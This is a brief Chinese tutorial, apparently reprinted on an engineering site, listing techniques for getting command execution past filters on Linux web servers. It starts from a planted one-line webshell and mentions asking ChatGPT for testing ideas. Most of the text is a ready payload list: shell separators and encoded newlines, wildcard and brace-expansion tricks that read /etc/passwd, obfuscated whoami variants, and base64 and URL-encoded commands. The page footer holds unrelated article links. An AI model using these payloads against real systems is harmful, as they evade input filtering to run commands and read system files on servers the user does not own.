Linux命令執行Bypass常見姿勢介紹
0x01實踐演示
部署服務器端為Linux系統的http服務,留存get和post方式的一句話木馬,用于命令執行測試。(測試思路可以對話Chatgpt)
linux邏輯運算符
; //分號
| //僅執行后面那條命令
|| //僅執行前面那條命令
& //兩條命令都會執行
&& //兩條命令都會執行(注意url編碼)
%0a //換行符 %0d //回車符
利用通配符
通配符"?"代表任意一個字符,"*"代表任意個字符
cat%20/etc/pa??wd
cat%20/etc/pa?*wd
嘗試
cat /*****et*c*/*pas**************************************************swd
結合上述方式進行組合bypass
echo mt ; whoami
使用大括號來繞過空格的限制
{cat,/etc/passwd}
{ls,-alth}
命令混淆
whoami wh$1oami who$@ami whoa$*mi
命令變形
/*/bin/wh*mi /us*/*in/who*mi /*s?/*?n/w?o*i
base64編碼方式進行
echo id|base64 echo id|base64
URL編碼
%28%22%65%5c%63%68%6f%20%5c%69%5c%64%7c%62%61%73%65%36%34%22%29%3b
審核編輯:劉清
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。
舉報投訴
-
Linux系統
+關注
關注
4文章
614瀏覽量
29904 -
URL
+關注
關注
0文章
142瀏覽量
16220 -
ChatGPT
+關注
關注
31文章
1598瀏覽量
10264
發布評論請先 登錄
相關推薦
熱點推薦
Linux重啟命令介紹
下面介紹在 Linux 操作系統中重啟和關閉相關的命令:shutdown、reboot、init、halt、poweroff、systemctl,你可以根據需要來選擇適合的 Linux
發表于 10-13 15:33
Linux重啟命令介紹
下面介紹在 Linux 操作系統中重啟和關閉相關的命令:shutdown、reboot、init、halt、poweroff、systemctl,你可以根據需要來選擇適合的 Linux
發表于 01-28 15:58
?1354次閱讀
嵌入式Linux開發教程:Linux常見命令(上篇)
摘要:這是對周立功編著的《嵌入式Linux開發教程》的第7期連載。本期刊載內容有關LinuxLinux常見命令中的導航命令、目錄命令和文件
發表于 10-21 13:36
?11次下載
linux技術:WAF運行命令執行方法
如果命令執行的時候遇到攔截命令關鍵詞的時候可以利用如下方法繞過: "和^是CMD命令中最常見的轉義字符,還有成對的括號并不會影響
發表于 11-07 20:27
?1718次閱讀
常用Linux命令介紹
linux命令是對Linux系統進行管理的命令。對于Linux系統來說,無論是中央處理器、內存、磁盤驅動器、鍵盤、鼠標,還是用戶等都是文件,
Linux中一次運行多個命令的方法介紹
Linux 終端是一個功能強大的工具,允許您使用命令執行各種系統操作。文件操作、程序管理和服務自動化是您可以使用 shell 命令高效執行的
發表于 03-20 09:39
?8836次閱讀
Linux命令執行Bypass常見姿勢
部署服務器端為Linux系統的http服務,留存get和post方式的一句話木馬,用于命令執行測試。(測試思路可以對話Chatgpt)
linux重啟命令有哪些
Linux是一種自由和開放源代碼的操作系統,被廣泛應用于服務器和嵌入式設備。在Linux中,有多種命令用于重啟系統。在本文中,我們將詳細介紹常用的L
總結linux命令行的主要用法
Linux命令行是一種在Linux操作系統中通過文本界面來執行指令和管理系統的方式。它提供了豐富的功能和靈活性,幫助用戶完成各種任務。本文將詳細介紹
uboot命令的執行過程是什么
U-boot是通過執行u-boot提供的命令來加載Linux內核的,其中 命令bootm的功能 即為從memory啟動Linux內核映像文件
bypass電容多大 bypass電容怎么計算
的完整性。本文將詳細介紹Bypass電容的計算方法和常見應用。 一、Bypass電容的作用及原理 Bypass電容通常被用于電源和地之間的連
工商網監
評論